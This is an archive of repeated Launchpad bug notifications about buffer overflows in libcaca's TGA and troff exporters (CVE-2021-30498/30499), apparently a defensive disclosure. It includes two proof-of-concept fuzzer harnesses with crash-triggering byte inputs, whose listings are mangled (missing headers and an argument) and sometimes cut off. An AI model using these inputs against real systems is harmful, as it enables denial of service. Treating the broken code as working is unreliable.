[Desktop-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
** Changed in: libcaca (Ubuntu) Status: Confirmed => Fix Released -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1923273 Title: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff Status in libcaca package in Ubuntu: Fix Released Bug description: Hello Ubuntu Security Team, I used libFuzzer to test the libcaca API and found two crashes: - https://github.com/cacalabs/libcaca/issues/53 - https://github.com/cacalabs/libcaca/issues/54 ## Vendor of Product https://github.com/cacalabs/libcaca ## Affected Product Code Base libcaca e4968ba ## Affected Component affected component: libcaca.so ## Affected source code file Affected source code file (two call stacks, one per export format, sharing the first two frames): caca_export_canvas_to_memory() in libcaca/caca/codec/export.c -> caca_export_memory() in libcaca/caca/codec/export.c -> export_tga() in libcaca/caca/codec/export.c (reached by the "tga" PoC) or -> export_troff() in libcaca/caca/codec/export.c (reached by the "troff" PoC) ## Attack Type Context-dependent (the attacker must control data that an application imports into a canvas and later exports with the "tga" or "troff" format, as the PoCs below do) ## Impact Denial of Service (what the PoCs demonstrate: an AddressSanitizer-reported buffer overflow that aborts the process). The report does not establish whether the out-of-bounds access is a read or a write, so memory corruption with impact beyond a crash is not ruled out here; treat the issues as memory-safety bugs when prioritising. ## Reference https://github.com/cacalabs/libcaca ## Discoverer fdgnneig ## Verification process and POC ### Verification steps: 1. Get the source code of libcaca. 2. Compile the libcaca.so library: ```shell $ cd libcaca $ apt-get install automake libtool pkg-config -y $ ./bootstrap $ ./configure $ make 3. Run POC.sh to compile poc_troff.cc and poc_tga.cc 4. Run the POCs POC.sh ``` (Note: the listing below was mangled in transit — the system header names after each `#include` and the third argument of `caca_export_canvas_to_memory()` are missing, so it will not compile as shown; see the linked GitHub issues for the original reports.) cat << EOF > poc_troff.cc #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); 
caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"troff",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff cat << EOF > poc_tga.cc #include "config.h" #include "caca.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"tga",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; return 0; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++
[Desktop-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
** Changed in: libcaca (Ubuntu) Status: New => Confirmed -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1923273 Title: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff Status in libcaca package in Ubuntu: Confirmed Bug description: Hello Ubuntu Security Team I use libfuzzer to test libcaca api .I found two crash - https://github.com/cacalabs/libcaca/issues/53 - https://github.com/cacalabs/libcaca/issues/54 ## Vendor of Product https://github.com/cacalabs/libcaca ## Affected Product Code Base libcaca e4968ba ## Affected Component affected component:libcaca.so ## Affected source code file affected source code file(As call stack): ->caca_export_canvas_to_memory() in libcaca/caca/codec/export.c ->caca_export_memory()in libcaca/caca/codec/export.c -> export_tga()in libcaca/caca/codec/export.c -> export_troff() in libcaca/caca/codec/export.c ## Attack Type Context-dependent ## Impact Denial of Service true ## Reference https://github.com/cacalabs/libcaca ## Discoverer fdgnneig ## Verification process and POC ### Verification steps: 1.Get the source code of libcaca: 2.Compile the libcaca.so library: ```shell $ cd libcaca $ apt-get install automake libtool pkg-config -y $ ./bootstrap $ ./configure $ make 3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc 4.Run POC POC.sh ``` cat << EOF > poc_troff.cc #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); 
caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"troff",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff cat << EOF > poc_tga.cc #include "config.h" #include "caca.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"tga",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; return 0; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_tga.cc
[Desktop-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
Issues have been assigned CVE identifiers CVE-2021-30498 and CVE-2021-30499 (this page does not state which identifier corresponds to export_tga and which to export_troff; check the CVE records linked below before referencing them) ** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-30498 ** CVE added: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-30499 -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1923273 Title: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff Status in libcaca package in Ubuntu: New Bug description: Hello Ubuntu Security Team, I used libFuzzer to test the libcaca API and found two crashes: - https://github.com/cacalabs/libcaca/issues/53 - https://github.com/cacalabs/libcaca/issues/54 ## Vendor of Product https://github.com/cacalabs/libcaca ## Affected Product Code Base libcaca e4968ba ## Affected Component affected component: libcaca.so ## Affected source code file Affected source code file (two call stacks, one per export format, sharing the first two frames): caca_export_canvas_to_memory() in libcaca/caca/codec/export.c -> caca_export_memory() in libcaca/caca/codec/export.c -> export_tga() in libcaca/caca/codec/export.c (reached by the "tga" PoC) or -> export_troff() in libcaca/caca/codec/export.c (reached by the "troff" PoC) ## Attack Type Context-dependent (the attacker must control data that an application imports into a canvas and later exports with the "tga" or "troff" format, as the PoCs below do) ## Impact Denial of Service (what the PoCs demonstrate: an AddressSanitizer-reported buffer overflow that aborts the process). The report does not establish whether the out-of-bounds access is a read or a write, so memory corruption with impact beyond a crash is not ruled out here; treat the issues as memory-safety bugs when prioritising. ## Reference https://github.com/cacalabs/libcaca ## Discoverer fdgnneig ## Verification process and POC ### Verification steps: 1. Get the source code of libcaca. 2. Compile the libcaca.so library: ```shell $ cd libcaca $ apt-get install automake libtool pkg-config -y $ ./bootstrap $ ./configure $ make 3. Run POC.sh to compile poc_troff.cc and poc_tga.cc 4. Run the POCs POC.sh ``` (Note: the listing below was mangled in transit — the system header names after each `#include` and the third argument of `caca_export_canvas_to_memory()` are missing, so it will not compile as shown; see the linked GitHub issues for the original reports.) cat << EOF > poc_troff.cc #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); 
for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"troff",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff cat << EOF > poc_tga.cc #include "config.h" #include "caca.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"tga",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; return 0; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11}; len = sizeof(buffer)/sizeof(unsigned char);
[Desktop-packages] [Bug 1923273] Re: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff
** Summary changed: - libcaca buffer-overflow + buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to libcaca in Ubuntu. https://bugs.launchpad.net/bugs/1923273 Title: buffer-overflow on libcaca-0.99.beta20/export.c export_tga, export_troff Status in libcaca package in Ubuntu: New Bug description: Hello Ubuntu Security Team I use libfuzzer to test libcaca api .I found two crash - https://github.com/cacalabs/libcaca/issues/53 - https://github.com/cacalabs/libcaca/issues/54 ## Vendor of Product https://github.com/cacalabs/libcaca ## Affected Product Code Base libcaca e4968ba ## Affected Component affected component:libcaca.so ## Affected source code file affected source code file(As call stack): ->caca_export_canvas_to_memory() in libcaca/caca/codec/export.c ->caca_export_memory()in libcaca/caca/codec/export.c -> export_tga()in libcaca/caca/codec/export.c -> export_troff() in libcaca/caca/codec/export.c ## Attack Type Context-dependent ## Impact Denial of Service true ## Reference https://github.com/cacalabs/libcaca ## Discoverer fdgnneig ## Verification process and POC ### Verification steps: 1.Get the source code of libcaca: 2.Compile the libcaca.so library: ```shell $ cd libcaca $ apt-get install automake libtool pkg-config -y $ ./bootstrap $ ./configure $ make 3.Run POC.sh to compile poc_troff.cc 、poc_tga.cc 4.Run POC POC.sh ``` cat << EOF > poc_troff.cc #include "config.h" #include "caca.h" //#include "common-image.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); 
caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"troff",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x5f,0x20,0x6f,0x75,0x6e,0x64,0x0a,0x40,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char)); return 0; } EOF clang++ -g poc_troff.cc -O2 -fno-omit-frame-pointer -fsanitize=address -I./caca/ -lcaca -L./caca/.libs/ -Wl,-rpath,./caca/.libs/ -o poc_troff cat << EOF > poc_tga.cc #include "config.h" #include "caca.h" #include #include #include #include #include #include using namespace std; extern "C" int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { if(Size<8) return 0; size_t len=0; char* buffer = (char*)malloc(Size+1); memset(buffer,0,Size); memcpy(buffer,Data,Size); buffer[Size]='\0'; caca_canvas_t *cv; cv = caca_create_canvas(0,0); for(int i=0;i<4;i++) caca_create_frame(cv,0); for(int i=0;i<4;i++){ caca_set_frame(cv,i); caca_import_canvas_from_memory(cv,buffer,strlen(buffer),""); } void* reData = caca_export_canvas_to_memory(cv,"tga",); if(reData!=NULL) free(reData); caca_free_canvas(cv); cv=NULL; free(buffer); buffer=NULL; return 0; } int main(int args,char* argv[]){ size_t len = 0; unsigned char buffer[] = {0x00,0xff,0xff,0x23,0x64,0x72,0x23,0x20,0x11}; len = sizeof(buffer)/sizeof(unsigned char); LLVMFuzzerTestOneInput((const uint8_t*)buffer,len); printf("%d\n",sizeof(buffer)/sizeof(unsigned char));